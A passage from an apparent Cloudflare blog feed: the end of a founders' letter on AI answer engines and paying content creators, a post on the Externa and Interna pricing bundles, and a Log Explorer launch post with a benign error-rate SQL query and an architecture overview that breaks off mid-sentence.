    <p>But that same traffic-based reward system has also created many of the problems we lament about the current state of the Internet. Traffic has always been an imperfect proxy for value. Over the last 15 years we've watched more of the Internet driven by annoying clickbait or dangerous ragebait. Entire media organizations have built their businesses with a stated objective of writing headlines to generate the maximum cortisol response because that's what generates the maximum amount of traffic.</p><p>Over the years, Cloudflare has at times faced calls for us to intervene and control what content can be published online. As an infrastructure provider, we've never felt we were the right place for those editorial decisions to be made. But it wasn't because we didn't worry about the direction the traffic-incentivized Internet seemed to be headed. It always seemed like what fundamentally needed to change was not more content moderation at the infrastructure level but instead a healthier incentive system for content creation.</p><p>Today the conditions to bring about that change may be happening. In the last year, something core to the Internet we’ve all known has changed. It's being driven by AI and it has an opportunity with some care and nurturing to help bring about what we think may be a much better Internet.</p>
    <div>
      <h2>From Search to Answers</h2>
      <a href="#from-search-to-answers">
        
      </a>
    </div>
    <p>What’s the change? The primary discovery system of the Internet for the last 15 years has been Search Engines. They scraped the Internet's content, built an index, and then presented users with a treasure map which they followed generating traffic. Content creators were happy to let Search Engines scrape their content because there were a limited number of them, so the infrastructure costs were relatively low and, more importantly, because the Search Engines gave something to sites in the form of traffic — the Internet’s historic currency — sent back to sites.</p><p>It’s already clear that the Internet’s discovery system for the next 15 years will be something different: Answer Engines. Unlike Search Engines which gave you a map where you hunted for what you were looking for, driving traffic in the process, Answer Engines just give you the answer without you having to click on anything. For 95 percent of users 95 percent of the time, that is a better user experience.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5d2TQwVHA8GpFUBpAdr8QT/23fd6b7306d55dce3dea9e989784595d/BLOG-2994_3.png" />
          </figure><p>You don’t have to look far to see this is changing rapidly before our eyes. ChatGPT, Anthropic’s Claude, and other AI startups aren’t Search Engines — they’re Answer Engines. Even Google, the search stalwart, is increasingly serving “AI Overviews” in place of 10 blue links. We can often look to sci-fi movies to have a glimpse into our most likely future. In them, the helpful intelligent robot character didn’t answer questions with: “Here are some links you can click on to maybe find what you’re looking for.” Whether you like it or not, the future will increasingly be answers not searches.</p>
    <div>
      <h2>Short Term Pain</h2>
      <a href="#short-term-pain">
        
      </a>
    </div>
    <p>In the short term, this is going to be extremely painful for some industries that are built based on monetizing traffic. It already is. While ecommerce and social applications haven't yet seen a significant drop in traffic as the world switches to Answer Engines, media companies have. Why the difference? Well, for the former, you still need to buy the thing the Answer Engine recommends and, for now, we still value talking with other humans.</p><p>But for media companies, if the Answer Engine gives you the summary of what you’re looking for in most cases you don’t need to read the story. And the loss of traffic for media companies has already been dramatic. It’s not just traditional media. Research groups at investment banks, industry analysts, major consulting firms — they’re all seeing major drops in people finding their content because we are increasingly getting answers not search treasure maps.</p><p>Some say these answer engines or agents are just acting on behalf of humans. Sure but so what? Without a change they will still kill content creators’ businesses. If you ask your agent to summarize twenty different news sources but never actually visit any of them you’re still undermining the business model of those news sources. Agents don’t click on ads. And if those agents are allowed to aggregate information on behalf of multiple users it’s an even bigger problem because then subscription revenue is eliminated as well. Why subscribe to the Wall Street Journal or New York Times or Financial Times or Washington Post if my agent can free ride off some other user who does?</p><p>Unless you believe that content creators should work for free, or that they are somehow not needed anymore — both of which are naive assumptions — something needs to change. A visit from an agent isn’t the same as a visit from a human and therefore should have different rules of the road. If nothing changes, the drop in human traffic to the media ecosystem writ large will kill the business model that has built the content-rich Internet we enjoy today.</p><p>We think that’s an existential threat to one of humanity’s most important creations: the Internet.</p>
    <div>
      <h2>Rewarding Better Content</h2>
      <a href="#rewarding-better-content">
        
      </a>
    </div>
    <p>But there’s reason for optimism. Content is the fuel that powers every AI system and the companies that run those AI systems know ultimately they need to financially support the ecosystem. Because of that it seems potentially we're on the cusp of a new, better, and maybe healthier Internet business model. As content creators use tools like the <a href="https://blog.cloudflare.com/introducing-ai-crawl-control/"><u>ones provided by Cloudflare to restrict AI robots from taking their content without compensation</u></a>, we're already seeing a market emerge and better deals being struck between AI and content companies.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5J0hmMolAcrPKBZSJzKNMw/d78a04e0ae0afb2c578e7b7c1ca8b1c9/BLOG-2994_4.png" />
          </figure><p>What's most interesting is what content companies are getting the best deals. It's not the ragebait headline writers. It's not the news organizations writing yet another take on what's going on in politics. It's not the spammy content farms full of drivel. Instead, it's <a href="https://www.bloomberg.com/news/articles/2025-09-17/reddit-seeks-to-strike-next-ai-content-pact-with-google-openai"><u>Reddit</u></a> and other quirky corners that best remind us of the Internet of old. For those of you old enough, think back to the Internet not of the last 15 years but of the last 35. We’ve lost some of what made that early Internet great, but there are indications that we might finally have the incentives to bring more of it back.</p><p>It seems increasingly likely that in our future, AI-driven Internet — assuming the AI companies are willing to step up, support the ecosystem, and pay for the content that is the most valuable to them — it’s the creative, local, unique, original content that’ll be worth the most. And, if you’re like us, the thing you as an Internet consumer are craving more of is creative, local, unique, original content. And, it turns out, having talked with many of them, that’s the content that content creators are most excited to create.</p>
    <div>
      <h2>A New Internet Business Model</h2>
      <a href="#a-new-internet-business-model">
        
      </a>
    </div>
    <p>So how will the business model work? Well, for the first time in history, we have a pretty good mathematical representation of human knowledge. Sum up all the LLMs and that's what you get. It's not perfect, but it's pretty good. Inherently, the same mathematical model serves as a map for the gaps in human knowledge. Like a block of Swiss Cheese — there's a lot of cheese, but there's also a lot of holes.</p><p>Imagine a future business model of the Internet that doesn't reward traffic-generating ragebait but instead rewards those content creators that help fill in the holes in our collective metaphorical cheese. That will involve some portion of the subscription fees AI companies collect, and some portion of the revenue from the ads they'll inevitably serve, going back to content creators who most enrich the collective knowledge.</p><p>As a rough and simplistic sketch, think of it as some number of dollars per AI company’s monthly active users going into a collective pool to be distributed out to content creators based on what most fills in the holes in the cheese.</p><p>You could imagine an AI company suggesting back to creators that they need more created about topics they may not have enough content about. Say, for example, the carrying capacity of unladened swallows because they know their subscribers of a certain age and proclivity are always looking for answers about that topic. The very pruning algorithms the AI companies use today form a roadmap for what content is worth enough to not be pruned but paid for.</p><p>While today the budget items that differentiate AI companies are how much they can afford to spend on GPUs and top talent, as those things inevitably become more and more commodities it seems likely what will differentiate the different AIs is their access to creative, local, unique, original content. And the math of their algorithms provides them a map of what’s worth the most. While there are a lot of details to work out, those are the ingredients you need for a healthy market.</p>
    <div>
      <h2>Cloudflare’s Role</h2>
      <a href="#cloudflares-role">
        
      </a>
    </div>
    <p>As we think about our role at Cloudflare in this developing market, it's not about protecting the status quo but instead helping catalyze a better business model for the future of Internet content creation. That means creating a level playing field. Ideally there should be lots of AI companies, large and small, and lots of content creators, large and small.</p><p>It can’t be that a new entrant AI company is at a disadvantage to a legacy search engine because one has to pay for content but the other gets it for free. But it’s also critical to realize that the right solution to that current conundrum isn’t that no one pays, it’s that, new or old, everyone who benefits from the ecosystem should contribute back to it based on their relative size.</p><p>It may seem impossibly idealistic today, but the good news is that based on the conversations we’ve had we’re confident if a few market participants tip — whether because they step up and do the right thing or are compelled — we will see the entire market tipping and becoming robust very quickly.</p>
    <div>
      <h2>Supporting the Ecosystem</h2>
      <a href="#supporting-the-ecosystem">
        
      </a>
    </div>
    <p>We can't do this alone and we have no plans to try to. Our mission is not to “build a better Internet” but to “<b><i>help</i></b> build a better Internet.” The solutions developed to facilitate this market need to be open, collaborative, standardized, and shared across many organizations. We’ll take some encouraging steps in that direction with announcements on partnerships and collaborations this week. And we’re proud to be a leader in this space.</p><p>The Internet is an ecosystem and we, other infrastructure providers, along with most importantly both AI companies and content creators, will be critical in ensuring that ecosystem is healthy. We’re excited to partner with those who are ready to step up and do their part to also help build a better Internet. It is possible.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6EHC7vxXoMmle1QFHwGHh9/408b73f7b677701e7242e794efa3cb52/unnamed__29_.png" />
          </figure><p>And we're optimistic that if others can collaborate in supporting the ecosystem we may be at the cusp of a new golden age of the Internet. Our conversations with the leading AI companies nearly all acknowledge that they have a responsibility to give back to the ecosystem and compensate content creators. Confirming this, the largest publishers are reporting they're having much more constructive conversations about licensing their content to those AI companies. And, this week, we'll be announcing new tools to help even the smallest publishers take back control of who can use what they've created.</p><p>It may seem impossible. We think it’s a no-brainer. We're proud of what Cloudflare has accomplished over the last 15 years, but there’s a lot left to do to live up to our mission. So, more than ever, it's clear: giddy up, because we're just getting started!</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/15o6NDQsh19vfz6RC9nD5v/03f8f84dc09366ffc617829f35b2e255/BLOG-2994_5.png" />
          </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Founders' Letter]]></category>
            <guid isPermaLink="false">3dHDa6KprJoyjJldD2eInH</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>Michelle Zatlyn</dc:creator>
        </item>
        <item>
            <title><![CDATA[Aligning our prices and packaging with the problems we help customers solve]]></title>
            <link>https://blog.cloudflare.com/aligning-our-prices-and-packaging-with-the-problems-we-help-customers-solve/</link>
            <pubDate>Mon, 11 Aug 2025 23:03:00 GMT</pubDate>
            <description><![CDATA[ You asked for simplicity. We listened. Introducing Externa and Interna, two new use-case-driven packages to simplify how you connect and protect your entire infrastructure. ]]></description>
            <content:encoded><![CDATA[ <p>At Cloudflare, we have a simple but audacious goal: to help build a better Internet. That mission has driven us to build one of the <a href="https://www.cloudflare.com/network/"><u>world’s largest networks</u></a>, to <a href="https://blog.cloudflare.com/content-independence-day-no-ai-crawl-without-compensation/"><u>stand up for content providers</u></a>, and to innovate relentlessly to make the Internet safer, faster, and more reliable for everyone, everywhere.</p><p>Building world-class products is only part of the battle, however. Fulfilling our mission means making these products accessible, including a pricing model that is fair, predictable, and aligned with the value we provide. If our packaging is confusing, or if our pricing penalizes you for using the service, then we’re not living up to our <a href="https://www.cloudflare.com/about-overview/"><u>mission</u></a>. And the best way to ensure that alignment?</p><p>Listen to our customers.</p><p>Over the years, your feedback has shaped our product roadmap, helping us evolve to offer <a href="https://developers.cloudflare.com/products/"><u>nearly 100 products</u></a> across four solution areas — <a href="https://www.cloudflare.com/application-services/#application-services-case-products"><u>Application Services</u></a>, <a href="https://www.cloudflare.com/network-services/#network-services-products"><u>Network Services</u></a>, <a href="https://www.cloudflare.com/zero-trust/#platform-capabilities"><u>Zero Trust Services</u></a>, and our <a href="https://www.cloudflare.com/plans/developer-platform/"><u>Developer Platform</u></a> — on a single, unified platform and network infrastructure. Recently, we’ve heard a new theme emerge: the need for simplicity. You’ve asked us, “A hundred products is a lot. Can you please be more prescriptive?” and “Can you make your pricing more straightforward?”</p><p>We heard that feedback loud and clear. That's why we are incredibly excited to introduce <b>Externa</b> and <b>Interna</b>,<b> </b>two new families of <a href="http://cloudflare.com/plans/enterprise"><u>use-case bundles</u></a> designed to simplify your journey with Cloudflare.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6YAEafOTtpzusmVvdqDVXY/876ca11211dadf6bbe6750719a3df476/image6.png" />
          </figure>
    <div>
      <h2>Two challenges, two solutions</h2>
      <a href="#two-challenges-two-solutions">
        
      </a>
    </div>
    <p>When we speak with CIOs, CTOs, and CISOs, their challenges almost always boil down to connecting and protecting two fundamental domains: (1) their external, public-facing infrastructure and (2) their internal, private systems.</p><p>Historically, the industry has sold dozens of point products to solve these problems with a series of band-aids. A WAF from one vendor, a DDoS scrubber from another, a VPN from a third. The result is a mess of complexity, vendor lock-in, and a security posture riddled with gaps. It’s expensive, inefficient, and insecure. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6QQlNLsDlXy6KDC1CtlIt7/4adb4bb9fd09e6cdd4501193dabdbff8/image1.png" />
          </figure><p>We think that’s backwards. There’s a simpler, more integrated approach with our new solution packages:</p><ul><li><p><a href="http://cloudflare.com/plans/enterprise/externa"><b><u>Externa</u></b></a> to connect and protect the part of your business facing the public Internet — the websites, APIs, applications, and networks that are the front doors and face of your business</p></li><li><p><a href="http://cloudflare.com/plans/enterprise/interna"><b><u>Interna</u></b></a> to connect and protect your internal private systems and resources — the employees, devices, data, and networks that are at the heart of your organization</p></li></ul><p>These packages represent our prescriptive view on what a modern connectivity and security architecture should look like. And, they’re best when used together.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6fBZrEDR6ZjbyXI7H4A6ca/dc516fb5df17b3dfffe50e91046c7b77/image2.png" />
          </figure>
    <div>
      <h3>Externa: Connect and protect external, public-facing systems </h3>
      <a href="#externa-connect-and-protect-external-public-facing-systems">
        
      </a>
    </div>
    <p>With Externa, we’re solving for the complexity of connecting and protecting your public-facing infrastructure. A key principle here is fairness. We’ve seen competitors send customers astronomical bills after a DDoS attack because they charge for all traffic — clean or malicious. It’s like a fire department charging you for the water they use to save your house. We don’t do that and never have, which is why with Externa, you only pay for legitimate traffic.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3WMMfD7mIQQiuErqQYdbEl/d93735230352c83164155eeb25f2c358/image7.png" />
          </figure><p>We believe a simple, integrated model will reduce total cost of ownership and lead to a stronger security posture. A patchwork of band-aids is a lot of overhead to manage. Externa bundles our WAF, DDoS, API security, networking, application performance services, and more, into a simple package with units of measure that scale with value.</p><p>What does this mean for you?</p><ul><li><p><b>No attack traffic tax:</b> your costs remain predictable, even during a massive DDoS attack.</p></li><li><p><b>Simple, value-driven price units: </b>no origin fetch fees, duplicate charges per request, or paying per rule.</p></li><li><p><b>Simplified connectivity costs:</b> free private interconnects to on-ramp easily, wherever you’re hosted.</p></li></ul><p>And because security shouldn’t stop at your perimeter, every Externa package includes 50 seats of Interna, our SASE solution package.</p>
    <div>
      <h3>Interna: Connect and protect internal, private systems </h3>
      <a href="#interna-connect-and-protect-internal-private-systems">
        
      </a>
    </div>
    <p>With Interna, we’re fixing the broken economics of networking and security. The old models were built for a world where everyone came into an office. The world has changed: in today’s hybrid work environment, your internal network isn't just confined to your offices and data centers anymore. It's wherever your employees and data are. But many vendors still effectively charge you twice for the same user — once for the seat and again when they’re using the office network.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4tj5DIu3g9Nt3Bofez1wrt/33e87281bc08e37aec8a7cd968bab7eb/image3.png" />
          </figure><p>We believe you should never pay for user bandwidth. Our model recognizes that a user is a user, wherever they are; we don’t double-charge for bandwidth; we actually subtract the traffic that’s generated from user device clients from your WAN meter. We’ve gone a step further: every Interna user license contributes to a shared bandwidth pool that you can use to build a modern, secure, and fast corporate WAN. With Interna, the budget you already have for security now builds your corporate network, too.</p><p>What does this mean for you?</p><ul><li><p><b>Never pay for user bandwidth:</b> a single per-seat price covers your users wherever they work, reducing your WAN bill and eliminating the hybrid work penalty.</p></li><li><p><b>Each license expands your WAN:</b> pooled bandwidth from user licenses helps you replace expensive, dedicated WAN contracts.</p></li><li><p><b>All-inclusive security: </b>premium features like Digital Experience Monitoring (DEM) and both in-line and API-based Cloud Access Security Broker (CASB) are included, not expensive add-ons.</p></li></ul>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5WBGLrGyg3qtl7F3qCv02O/6175c2b9bb15676b42b50247675cb814/image5.png" />
          </figure>
    <div>
      <h2>The unifying Cloudflare advantage</h2>
      <a href="#the-unifying-cloudflare-advantage">
        
      </a>
    </div>
    <p>Our unique advantage has always been our network. Serving millions of customers — from individual developers on our <a href="https://www.cloudflare.com/plans/free/"><u>Free plan</u></a> to the world’s largest enterprises — on one platform and one global network gives us incredible leverage. It’s what allows us to offer robust <a href="https://blog.cloudflare.com/cloudflares-commitment-to-free/"><u>free services</u></a> and <a href="https://www.cloudflare.com/galileo/"><u>protect journalists and nonprofits</u></a>. It’s also what makes our platform structurally better: our AI models are trained on data from <a href="https://w3techs.com/technologies/history_overview/proxy/all/q"><u>20% of the web</u></a>, providing more effective threat detection than siloed platforms ever could.</p><p>We believe that the same structural advantage should help businesses of all sizes scale without compromise. As companies grow, they often face a difficult choice: does the patchwork of point products they started with become too complex to manage, or does the integrated platform they chose become too limited? You asked for a more prescriptive path, one that solves this false choice.</p><p>With our new Externa and Interna bundles, that trade-off is over. The Essentials, Advantage, and Premier tiers in each family are designed to provide a clear path for businesses of all sizes, allowing you to adopt stage-appropriate networking and security solutions that scale seamlessly. As your business grows, you move up the tiers from Essentials to Advantage to Premier, gaining access to more advanced features along the way. It’s growth, simplified.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5XbdgSca7xaTYry7Px1BHp/016f33e4a7615be87f10564f7bb17007/image8.png" />
          </figure>
    <div>
      <h2>Ready for the next steps towards simplified security and connectivity?</h2>
      <a href="#ready-for-the-next-steps-towards-simplified-security-and-connectivity">
        
      </a>
    </div>
    <p>We’ve aimed to deliver pricing and packaging that is fair, accessible, predictable, and scales with value. This is what it means to align our pricing and packaging with our principles. It’s another step toward a better Internet. </p><p>Learn more about these <a href="http://cloudflare.com/plans/enterprise/externa"><u>packages</u></a> or <a href="https://www.cloudflare.com/plans/enterprise/contact/"><u>contact our sales team</u></a> today to learn how to transform your business.</p> ]]></content:encoded>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[SAAS Security]]></category>
            <category><![CDATA[SASE]]></category>
            <category><![CDATA[Security]]></category>
            <guid isPermaLink="false">6ViGc4xZSNpFpya8MRegxQ</guid>
            <dc:creator>Liam Reese</dc:creator>
            <dc:creator>Phil Winslow</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare Log Explorer is now GA, providing native observability and forensics]]></title>
            <link>https://blog.cloudflare.com/logexplorer-ga/</link>
            <pubDate>Wed, 18 Jun 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ We are happy to announce the General Availability of Cloudflare Log Explorer, a powerful product designed to bring observability and forensics capabilities directly into your Cloudflare dashboard. ]]></description>
            <content:encoded><![CDATA[ <p>We are thrilled to announce the General Availability of <a href="http://cloudflare.com/application-services/products/log-explorer/"><u>Cloudflare Log Explorer</u></a>, a powerful new product designed to bring <a href="https://www.cloudflare.com/learning/performance/what-is-observability/">observability and forensics capabilities</a> directly into your Cloudflare dashboard. Built on the foundation of Cloudflare's vast <a href="https://www.cloudflare.com/network/"><u>global network</u></a>, Log Explorer leverages the unique position of our platform to provide a comprehensive and contextualized view of your environment.</p><p>Security teams and developers use Cloudflare to detect and mitigate threats in real-time and to optimize application performance. Over the years, users have asked for additional telemetry with full context to investigate security incidents or troubleshoot application performance issues without having to forward data to third party log analytics and Security Information and Event Management (SIEM) tools. Besides avoidable costs, forwarding data externally comes with other drawbacks such as: complex setups, delayed access to crucial data, and a frustrating lack of context that complicates quick mitigation. </p><p>Log Explorer has been previewed by several hundred customers over the last year, and they attest to its benefits: </p><blockquote><p><i>“Having WAF logs (firewall events) instantly available in Log Explorer with full context — no waiting, no external tools — has completely changed how we manage our firewall rules. I can spot an issue, adjust the rule with a single click, and immediately see the effect. It’s made tuning for false positives faster, cheaper, and far more effective.” </i></p></blockquote><blockquote><p><i>“While we use Logpush to ingest Cloudflare logs into our SIEM, when our development team needs to analyze logs, it can be more effective to utilize </i><b><i>Log Explorer</i></b><i>. SIEMs make it difficult for development teams to write their own queries and manipulate the console to see the logs they need. Cloudflare's Log Explorer, on the other hand, makes it much </i><b><i>easier</i></b><i> for dev teams to look at logs and directly search for the information they need.”</i></p></blockquote><p>With Log Explorer, customers have access to Cloudflare logs with all the context available within the Cloudflare platform. Compared to external tools, customers benefit from: </p><ul><li><p><b>Reduced cost and complexity:</b> Drastically reduce the expense and operational overhead associated with forwarding, storing, and analyzing terabytes of log data in external tools.</p></li><li><p><b>Faster detection and triage:</b> Access Cloudflare-native logs directly, eliminating cumbersome data pipelines and the ingest lags that delay critical security insights.</p></li><li><p><b>Accelerated investigations with full context:</b> Investigate incidents with Cloudflare's unparalleled contextual data, accelerating your analysis and understanding of "What exactly happened?" and "How did it happen?"</p></li><li><p><b>Minimal recovery time:</b> Seamlessly transition from investigation to action with direct mitigation capabilities via the Cloudflare platform.</p></li></ul><p>Log Explorer is available as an add-on product for customers on our self serve or Enterprise plans. Read on to learn how each of the capabilities of Log Explorer can help you detect and diagnose issues more quickly.</p>
    <div>
      <h3>Monitor security and performance issues with custom dashboards</h3>
      <a href="#monitor-security-and-performance-issues-with-custom-dashboards">
        
      </a>
    </div>
    <p>Custom dashboards allow you to define the specific metrics you need in order to monitor unusual or unexpected activity in your environment.</p><p>Getting started is easy, with the ability to create a chart using natural language. A natural language interface is integrated into the chart create/edit experience, enabling you to describe in your own words the chart you want to create. Similar to the <a href="https://blog.cloudflare.com/security-analytics-ai-assistant/"><u>AI Assistant we announced during Security Week 2024</u></a>, the prompt translates your language to the appropriate chart configuration, which can then be added to a new or existing custom dashboard.</p><p>As an example, you can create a dashboard for monitoring for the presence of Remote Code Execution (RCE) attacks happening in your environment. An RCE attack is where an attacker is able to compromise a machine in your environment and execute commands. The good news is that RCE is a detection available in Cloudflare WAF.  In the dashboard example below, you can not only watch for RCE attacks, but also correlate them with other security events such as malicious content uploads, source IP addresses, and JA3/JA4 fingerprints. Such a scenario could mean one or more machines in your environment are compromised and being used to spread malware — surely, a very high risk incident!</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1UWOHhIaIFiBTtnohdvbAx/40eeac0b52bc278d0687f7d48cd875fd/BLOG-2838_2.png" />
          </figure><p>A reliability engineer might want to create a dashboard for monitoring errors. They could use the natural language prompt to enter a query like “Compare HTTP status code ranges over time.” The AI model then decides the most appropriate visualization and constructs their chart configuration.</p><p>While you can create custom dashboards from scratch, you could also use an expert-curated dashboard template to jumpstart your security and performance monitoring. </p><p>Available templates include: </p><ul><li><p><b>Bot monitoring:</b> Identify automated traffic accessing your website</p></li><li><p><b>API Security:</b> Monitor the data transfer and exceptions of API endpoints within your application</p></li><li><p><b>API Performance:</b> See timing data for API endpoints in your application, along with error rates</p></li><li><p><b>Account Takeover: </b>View login attempts, usage of leaked credentials, and identify account takeover attacks</p></li><li><p><b>Performance Monitoring:</b> Identify slow hosts and paths on your origin server, and view <a href="https://blog.cloudflare.com/ttfb-is-not-what-it-used-to-be/">time to first byte (TTFB)</a> metrics over time</p></li><li><p><b>Security Monitoring:</b> monitor attack distribution across top hosts and paths, correlate DDoS traffic with origin Response time to understand the impact of DDoS attacks.</p></li></ul>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3PO726Rhjol9khGOdMMnQJ/55462052782974b0fc5b0c885e42e41b/BLOG-2838_3.png" />
          </figure>
    <div>
      <h3>Investigate and troubleshoot issues with Log Search </h3>
      <a href="#investigate-and-troubleshoot-issues-with-log-search">
        
      </a>
    </div>
    <p>Continuing with the example from the prior section, after successfully diagnosing that some machines were compromised through the RCE issue, analysts can pivot over to Log Search in order to investigate whether the attacker was able to access and compromise other internal systems. To do that, the analyst could search logs from Zero Trust services, using context, such as compromised IP addresses from the custom dashboard, shown in the screenshot below: </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4iPrTc1ZtLU4ZxQWojvmje/d09bb0bf25bd17cea1d2f955371d991e/BLOG-2838_4.png" />
          </figure><p>Log Search is a streamlined experience including data type-aware search filters, or the ability to switch to a custom SQL interface for more powerful queries. Log searches are also available via a <a href="https://developers.cloudflare.com/logs/log-explorer/"><u>public API</u></a>. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4AytV9wASU5kUuThnhl0CQ/de8c9f4b829e1ccfebdb33bd9522ae5b/BLOG-2838_5.png" />
          </figure>
    <div>
      <h3>Save time and collaborate with saved queries</h3>
      <a href="#save-time-and-collaborate-with-saved-queries">
        
      </a>
    </div>
    <p>Queries built in Log Search can now be saved for repeated use and are accessible to other Log Explorer users in your account. This makes it easier than ever to investigate issues together. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4ouInu3nk7iZnAcJAs39F8/cc7ca6a61d19d3d9c1371ad2ca87e913/BLOG-2838_6.png" />
          </figure>
    <div>
      <h3>Monitor proactively with Custom Alerting (coming soon)</h3>
      <a href="#monitor-proactively-with-custom-alerting-coming-soon">
        
      </a>
    </div>
    <p>With custom alerting, you can configure custom alert policies in order to proactively monitor the indicators that are important to your business. </p><p>Starting from Log Search, define and test your query. From here you can opt to save and configure a schedule interval and alerting policy. The query will run automatically on the schedule you define.</p>
    <div>
      <h4>Tracking error rate for a custom hostname</h4>
      <a href="#tracking-error-rate-for-a-custom-hostname">
        
      </a>
    </div>
    <p>If you want to monitor the error rate for a particular host, you can use this Log Search query to calculate the error rate per time interval:</p>
            <pre><code>SELECT SUBSTRING(EdgeStartTimeStamp, 1, 14) || '00:00' AS time_interval,
       COUNT() AS total_requests,
       COUNT(CASE WHEN EdgeResponseStatus &gt;= 500 THEN 1 ELSE NULL END) AS error_requests,
       COUNT(CASE WHEN EdgeResponseStatus &gt;= 500 THEN 1 ELSE NULL END) * 100.0 / COUNT() AS error_rate_percentage
 FROM http_requests
WHERE EdgeStartTimestamp &gt;= '2025-06-09T20:56:58Z'
  AND EdgeStartTimestamp &lt;= '2025-06-10T21:26:58Z'
  AND ClientRequestHost = 'customhostname.com'
GROUP BY time_interval
ORDER BY time_interval ASC;
</code></pre>
            <p>Running the above query returns the following results. You can see the overall error rate percentage in the far right column of the query results.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5v8SNmHt4OJrLSkiM2EKtJ/182c7f5709eef1fbb9e93c5423fc1bae/BLOG-2838_7.png" />
          </figure>
    <div>
      <h4>Proactively detect malware</h4>
      <a href="#proactively-detect-malware">
        
      </a>
    </div>
    <p>We can identify malware in the environment by monitoring logs from <a href="https://developers.cloudflare.com/cloudflare-one/policies/gateway/">Cloudflare Secure Web Gateway</a>. As an example, <a href="https://www.broadcom.com/support/security-center/protection-bulletin/new-katz-stealer-malware-as-a-service-compromises-web-browsers"><u>Katz Stealer</u></a> is malware-as-a-service designed for stealing credentials. We can monitor DNS queries and HTTP requests from users within the company in order to identify any machines that may be infected with Katz Stealer malware. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7jgBTCWYpnWoNrFh8xe6ki/306e644ec3753976315c16c9d1560eec/BLOG-2838_8.png" />
          </figure>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7jFwBxsk8rfD3VLAYkG2iA/ebd2ebcd95d12b40978f22bf1bc7be39/BLOG-2838_9.png" />
          </figure><p>And with custom alerts, you can configure an alert policy so that you can be notified via webhook or PagerDuty.</p>
    <div>
      <h3>Maintain audit &amp; compliance with flexible retention (coming soon)</h3>
      <a href="#maintain-audit-compliance-with-flexible-retention-coming-soon">
        
      </a>
    </div>
    <p>With flexible retention, you can set the precise length of time you want to store your logs, allowing you to meet specific compliance and audit requirements with ease. Other providers require archiving or hot and cold storage, making it difficult to query older logs. Log Explorer is built on top of our R2 storage tier, so historical logs can be queried as easily as current logs. </p>
    <div>
      <h3>How we built Log Explorer to run at Cloudflare scale</h3>
      <a href="#how-we-built-log-explorer-to-run-at-cloudflare-scale">
        
      </a>
    </div>
    <p>With Log Explorer, we have built a scalable log storage platform on top of <a href="https://www.cloudflare.com/developer-platform/products/r2/"><u>Cloudflare R2</u></a> that lets you efficiently search your Cloudflare logs using familiar SQL queries. In this section, we’ll look into how we did this and how we solved some technical challenges along the way.

Log Explorer consists of three components: ingestors, compactors, and queriers. Ingestors are responsible for writing logs from Cloudflare’s data pipeline to R2. Compactors optimize storage files, so they can be queried more efficiently. Queriers execute SQL queries from users by fetching, transforming, and aggregating matching logs from R2.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1qEH0futV2are5GnT6vjta/e50c0ec4bbb1cacada117d31b71502e2/BLOG-2838_10.png" />
          </figure><p>During ingestion, Log Explorer writes each batch of log records to a Parquet file in R2. <a href="https://parquet.apache.org/"><u>Apache Parquet</u></a> is an open-source columnar storage file format, and it was an obvious choice for us: it’s optimized for efficient data storage and retrieval, such as by embedding metadata like the minimum and maximum values of each column across the file which enables the queriers to quickly locate the data needed to serve the query.</p><p>Log Explorer stores logs on a per-customer level, just like Cloudflare D1, so that your data isn't mixed with that of other customers. In Q3 2025, per-customer logs will allow you the flexibility to create your own retention policies and decide in which regions you want to store your data.

But how does Log Explorer find those Parquet files when you query your logs? Log Explorer leverages the <a href="https://databricks.com/wp-content/uploads/2020/08/p975-armbrust.pdf"><u>Delta Lake</u></a> open table format to provide a database table abstraction atop R2 object storage. A table in Delta Lake pairs data files in Parquet format with a transaction log. The transaction log registers every addition, removal, or modification of a data file for the table – it’s stored right next to the data files in R2.</p><p>Given a SQL query for a particular log dataset such as <a href="https://developers.cloudflare.com/logs/reference/log-fields/zone/http_requests/"><u>HTTP Requests</u></a> or <a href="https://developers.cloudflare.com/logs/reference/log-fields/account/gateway_dns/"><u>Gateway DNS</u></a>, Log Explorer first has to load the transaction log of the corresponding Delta table from R2. Transaction logs are checkpointed periodically to avoid having to read the entire table history every time a user queries their logs.</p><p>Besides listing Parquet files for a table, the transaction log also includes per-column min/max statistics for each Parquet file. This has the benefit that Log Explorer only needs to fetch files from R2 that can possibly satisfy a user query. Finally, queriers use the min/max statistics embedded in each Parquet file to decide which row groups to fetch from the file.</p><p>Log Explorer processes SQL queries using <a href="https://arrow.apache.org/datafusion/"><u>Apache DataFusion</u></a>, a fast, extensible query engine written in Rust, and <a href="https://github.com/delta-io/delta-rs"><u>delta-rs</u></a>, a community-driven Rust implementation of the Delta Lake protocol. While standing on the shoulders of giants, our team had to solve some unique problems to provide 